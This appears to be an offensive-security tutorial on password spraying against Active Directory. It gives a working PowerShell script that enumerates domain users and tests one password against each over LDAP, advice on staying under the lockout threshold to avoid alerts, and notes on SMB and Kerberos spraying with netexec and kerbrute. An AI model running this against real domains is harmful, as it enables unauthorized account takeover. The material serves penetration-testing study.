Password Spraying

Before attempting any password attacks, check the domain's account lockout policy to avoid locking out accounts or triggering alerts.

# List the account policy
> net accounts
...
Lockout threshold:                                    5
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
...

Based on the above policy, we can safely try 4 login attempts per user every 30 minutes. This allows up to 192 attempts/user/day.

Tools like netexec can be used to enumerate the domain's account lockout policy.

LDAP-Based

This method leverages LDAP binding via PowerShell’s .NET libraries. It attempts authentication by trying to create an LDAP object — if it succeeds, the credentials are valid. This method is stealthy, no interactive log in, and respects lockout policy, but is slow and limited to one password per run.

# Get the domain and PDC
$domain = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = $domain.PdcRoleOwner.Name
# Construct the LDAP path
$ldap = "LDAP://$PDC/DC=" + $domain.Name.Replace('.', ',DC=')
# Attempt authentication
$entry = New-Object System.DirectoryServices.DirectoryEntry($ldap, "pete", "Nexus123!")
$entry.distinguishedName  # Triggers authentication

If the password is invalid, it throws an error. If valid, it returns the DN. We can automate this with the following script which loops through AD users and reports valid logins.

LDAPSpray.ps1

param(
    [string]$Password = "Nexus123!",
    [string]$Domain = ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).Name
)

Write-Host "[*] Starting LDAP password spray for domain: $Domain"
$PDC = ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().PdcRoleOwner).Name
$LDAP = "LDAP://$PDC/DC=" + $Domain.Replace('.', ',DC=')

# Get all users from AD
$Searcher = New-Object DirectoryServices.DirectorySearcher
$Searcher.Filter = "(objectCategory=person)"
$Searcher.PageSize = 1000
$Searcher.PropertiesToLoad.Add("sAMAccountName") > $null
$Users = $Searcher.FindAll() | ForEach-Object { $_.Properties.samaccountname }

foreach ($User in $Users) {
    if ([string]::IsNullOrWhiteSpace($User)) { continue }

    try {
        $Entry = New-Object System.DirectoryServices.DirectoryEntry($LDAP, $User, $Password)
        $null = $Entry.distinguishedName  # Force bind/authentication
        Write-Host "[+] VALID: $User : $Password"
    } catch {
        Write-Host "[-] INVALID: $User"
    }
}

> .\LDAPSpray.ps1 -Password "Nexus123!"

SMB-Based

This method involves a full SMB session setup/teardown on each authentication attempt so it's slow, noisy, and does not respect the lockout policy. We can perform this attack using tools like netexec.

With netxec, if a sprayed password is valid and the user is a local administrator on the target system, the (Pwn3d!) string will appear. This means that tools like psexec, wmiexec, or secretsdump can be used for lateral movement or privilege escalation.

Kerberos-Based

This method uses Kerberos AS-REQs to test credentials. It's lightweight (no full session required) and fast (only two UDP packets per attempt: AS-REQ, AS REP/error). This attack can be performed with tools like kerbrute, a cross-platform, fast, and reliable tool which performs password spraying by automating AS-REQ requests and interpreting the responses.

Method Comparison

Protocol	Noise	Lockout-Safe	Speed	Notes
LDAP	Low	✅ Yes	Medium	Scriptable, stealthy
SMB	High	❌ No	Slow	Reveals admin access (Pwn3d!)
Kerberos	Low	❌ No	Very Fast	UDP-based, great for fast spraying